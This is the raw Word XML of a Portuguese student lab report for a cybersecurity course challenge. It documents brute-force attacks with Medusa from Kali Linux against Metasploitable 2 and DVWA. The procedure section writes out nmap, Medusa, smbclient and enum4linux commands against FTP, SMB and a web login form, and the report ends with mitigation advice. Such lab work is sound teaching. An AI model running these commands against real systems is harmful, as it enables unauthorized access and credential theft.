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7F07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08A45319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6728E212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0B685E4F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3CD9F41F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4625A722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45FD0148" w14:textId="1474260F" w:rsidR="002D0AF9" w:rsidRPr="002D0AF9" w:rsidRDefault="00000000" w:rsidP="002D0AF9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Relatório</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Prático</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ataques</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Força Bruta com Medusa (Kali + Metasploitable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E8E78A" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRPr="002D0AF9" w:rsidRDefault="00AE628B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A43DCF" w14:textId="77777777" w:rsidR="002D0AF9" w:rsidRPr="002D0AF9" w:rsidRDefault="00000000" w:rsidP="002D0AF9">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Projeto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>realizado</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>desafio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DIO</w:t>
      </w:r>
      <w:r w:rsidR="002D0AF9" w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="002D0AF9" w:rsidRPr="002D0AF9">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>Santander Cibersegurança 2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D077153" w14:textId="2D89A463" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Kali Linux (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>atacante</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 / DVWA (alvo) — Rede: Host-only / Internal (VirtualBox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27857BA6" w14:textId="46E55643" w:rsidR="002D0AF9" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B498DC8" w14:textId="40F8EF54" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Resumo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FD11E01" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Este relatório documenta um laboratório controlado de testes de força bruta realizados com a ferramenta Medusa em um ambiente composto por duas VMs: Kali Linux (atacante) e Metasploitable 2 (alvo), com DVWA para testes web. O objetivo foi demonstrar técnicas de brute force em FTP, web (formulário DVWA) e SMB (password spraying / enumeração).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0478D8DE" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Objetivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B248196" w14:textId="570CC9A9" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:t>• Executar ataques de força bruta em serviços FTP, Web (DVWA) e SMB, utilizando Medusa.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>• Registrar comandos, wordlists e resultados.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Avaliar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e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>propor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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C0F2A" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Ambiente de Teste (Configuração)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422E9686" w14:textId="0F345EE6" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Topologia:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Kali Linux (VM atacante)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Metasploitable 2 (VM vítima) com serviços vulneráveis: FTP (vsftpd), Samba, DVWA (PHP web)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Rede: Host-only / Internal no VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10516B79" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Ferramentas e Wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E94BDCD" w14:textId="52BDDC42" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Ferramentas:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Kali Linux (terminal)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Medusa (brute force multi-threaded)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- smbclient, enum4linux, ftp, nmap</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Wordlists (exemplos usados):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- users.txt (lista de usuários)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- pass.txt (senhas candidatas simples: 123456, password, qwerty, msfadmin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4227D4" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Procedimento</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 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Utilizados</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="43FEDF5C" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Abaixo estão os comandos principais executados (copiar/colar no Kali).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CBA31E" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verificar IP da máquina alvo (Metasploitable):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="563D6F71" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="CitaoIntensa"/>
      </w:pPr>
      <w:r>
        <w:t>ip a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE92F13" w14:textId="7C312E5F" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Scan de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>portas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BFAA64" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="CitaoIntensa"/>
      </w:pPr>
      <w:r>
        <w:t>nmap -sV -p 21,80,139,445 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F8AAE6" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Password spraying / brute force SMB com Medusa:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C11AF6" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="CitaoIntensa"/>
      </w:pPr>
      <w:r>
        <w:t>medusa -h 192.168.56.101 -U users.txt -P pass.txt -M smbnt -T 2 -T 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35342E4D" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Listar shares via smbclient:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE11F22" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="CitaoIntensa"/>
      </w:pPr>
      <w:r>
        <w:t>smbclient -L //192.168.56.101 -U msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3074290E" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Força bruta FTP (Medusa):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7357BF6C" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="CitaoIntensa"/>
      </w:pPr>
      <w:r>
        <w:t>medusa -h 192.168.56.101 -U users.txt -P pass.txt -M ftp -t 6 | grep SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08577B10" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Acessar FTP manualmente:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F18CCC9" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="CitaoIntensa"/>
      </w:pPr>
      <w:r>
        <w:t>ftp 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157508CC" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Form brute force (DVWA) — exemplo Medusa HTTP module:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DF426A" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="CitaoIntensa"/>
      </w:pPr>
      <w:r>
        <w:t>medusa -h 192.168.56.101 -U users.txt -P pass.txt -M http -m PAGE:'/dvwa/login.php' -m FORM:'username=^USER&amp;password=^PASS&amp;login=Login' -m FAIL:'Login failed' -t 6 | grep SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103C137" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Enumeração com enum4linux:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28181341" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="CitaoIntensa"/>
      </w:pPr>
      <w:r>
        <w:t>enum4linux -a 192.168.56.101 | tee enum4_output.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA767E6" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Resultados Observados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3749C0BE" w14:textId="70D010A7" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Resumo dos achados:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Conta '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>identificada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FTP/SMB.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Shares Samba listadas (ADMIN$, msfadmin home, print$ etc.).</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- DVWA apresentou possibilidade de teste de formulário com credenciais fracas.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Nos prints anexados é possível ver as saídas do Medusa mostrando credenciais com [SUCCESS] e o login FTP bem-sucedido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2373F8DD" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>IP da máquina alvo (ip a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E48B8F" w14:textId="3BD9B4AE" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45420850" wp14:editId="1145C486">
            <wp:extent cx="50292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sploitable2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E20" w14:textId="77777777" w:rsidR="002D0AF9" w:rsidRDefault="002D0AF9"/>
    <w:p w14:paraId="4BCAB315" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:t>Conexão SMB / resultados smbclient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A450711" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C910BE4" wp14:editId="2382010C">
            <wp:extent cx="5029200" cy="2774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BConn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9D90" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Medusa: brute force FTP (grep SUCCESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F999E" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D6EED52" wp14:editId="339332F7">
            <wp:extent cx="5029200" cy="2827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teForce Medusa com GRE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257" w14:textId="77777777" w:rsidR="002D0AF9" w:rsidRDefault="002D0AF9">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295F6E66" w14:textId="614EA4B1" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Criação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users.txt e pass.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1AFE5E" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3116EED8" wp14:editId="57D5A863">
            <wp:extent cx="5029200" cy="134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ção de senh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B84B" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Resultados</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enum4linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572DF42E" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AA9C897" wp14:editId="1E810E8B">
            <wp:extent cx="5029200" cy="4774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2FC" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Medusa: brute force HTTP (DVWA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FBBB83" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B53B288" wp14:editId="64F4F1C2">
            <wp:extent cx="5029200" cy="3137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usa htt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D1B" w14:textId="77777777" w:rsidR="00AE628B" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Recomendações de Mitigação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2135A045" w14:textId="01396498" w:rsidR="00912195" w:rsidRDefault="00000000" w:rsidP="00912195">
      <w:r>
        <w:t>Medidas práticas para reduzir o risco de ataques de força bruta:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Utilizar senhas fortes e políticas de expiração.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Implementar bloqueio de conta / rate limiting após tentativas falhas.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Habilitar autenticação multifator (MFA) sempre que possível.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Monitorar logs e alertar tentativas massivas.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>- Restringir acesso por rede (firewall, VPN) e desativar serviços desnecessários.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">- Atualizar serviços (Samba, FTP, web apps) para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>versões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conhecidas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C959BF5" w14:textId="77777777" w:rsidR="00912195" w:rsidRPr="00912195" w:rsidRDefault="00912195" w:rsidP="00912195">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r w:rsidRPr="00912195">
        <w:t>8. Conclusão</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328CC937" w14:textId="07BABF18" w:rsidR="00912195" w:rsidRPr="00912195" w:rsidRDefault="00912195" w:rsidP="00912195">
      <w:r w:rsidRPr="00912195">
        <w:t xml:space="preserve">Este laboratório prático demonstrou de forma clara a eficácia e </w:t>
      </w:r>
      <w:r w:rsidRPr="00912195">
        <w:t>periculosidade</w:t>
      </w:r>
      <w:r w:rsidRPr="00912195">
        <w:t xml:space="preserve"> dos ataques de força bruta quando aplicados contra serviços com credenciais fracas e políticas de segurança inadequadas. Por meio da ferramenta Medusa, foi possível explorar com sucesso serviços como FTP, SMB e aplicações web (DVWA), obtendo acesso através de combinações simples de usuário e senha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E101A32" w14:textId="77777777" w:rsidR="00912195" w:rsidRPr="00912195" w:rsidRDefault="00912195" w:rsidP="00912195">
      <w:r w:rsidRPr="00912195">
        <w:t xml:space="preserve">Os resultados reforçam a importância crítica de adoção de senhas complexas, implementação de mecanismos de bloqueio após múltiplas tentativas falhas e utilização de autenticação multifator. A exposição de serviços desnecessários e desatualizados, como os presentes no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912195">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912195">
        <w:t xml:space="preserve"> 2, representa um risco significativo que pode ser mitigado com </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00912195">
        <w:t>hardening</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00912195">
        <w:t xml:space="preserve"> de sistemas e monitoramento contínuo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC9DA7D" w14:textId="77777777" w:rsidR="00912195" w:rsidRPr="00912195" w:rsidRDefault="00912195" w:rsidP="00912195">
      <w:r w:rsidRPr="00912195">
        <w:lastRenderedPageBreak/>
        <w:t>Em síntese, o estudo evidenciou que a segurança contra ataques de força bruta depende menos de ferramentas complexas e mais da consistência na aplicação de boas práticas de segurança e configurações robustas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A089337" w14:textId="77777777" w:rsidR="00912195" w:rsidRDefault="00912195"/>
    <w:p w14:paraId="27821A92" w14:textId="52D15AA0" w:rsidR="00AE628B" w:rsidRDefault="00AE628B"/>
    <w:sectPr w:rsidR="00AE628B" w:rsidSect="0003461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BD01" w14:textId="77777777" w:rsidR="00B74FD2" w:rsidRDefault="00B74FD2" w:rsidP="002D0AF9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4B522C2B" w14:textId="77777777" w:rsidR="00B74FD2" w:rsidRDefault="00B74FD2" w:rsidP="002D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53CB" w14:textId="143DB30B" w:rsidR="002D0AF9" w:rsidRDefault="002D0AF9">
    <w:pPr>
      <w:pStyle w:val="Rodap"/>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r>
      <w:tab/>
      <w:t>Rian Carlos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12B1" w14:textId="77777777" w:rsidR="00B74FD2" w:rsidRDefault="00B74FD2" w:rsidP="002D0AF9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5BD98CDA" w14:textId="77777777" w:rsidR="00B74FD2" w:rsidRDefault="00B74FD2" w:rsidP="002D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634360">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="411003295">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="359166862">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1274248956">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1227689097">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1524785177">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="875509419">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="81462815">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="64581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471"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="002D0AF9"/>
    <w:rsid w:val="00306EE7"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="006C5D5E"/>
    <w:rsid w:val="008906B1"/>
    <w:rsid w:val="008F10B8"/>
    <w:rsid w:val="00912195"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00AE628B"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00B74FD2"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00E44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C43FB2"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{C11AE72E-0500-4373-987E-A37E782F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Rian Carlos</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-18T03:59:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>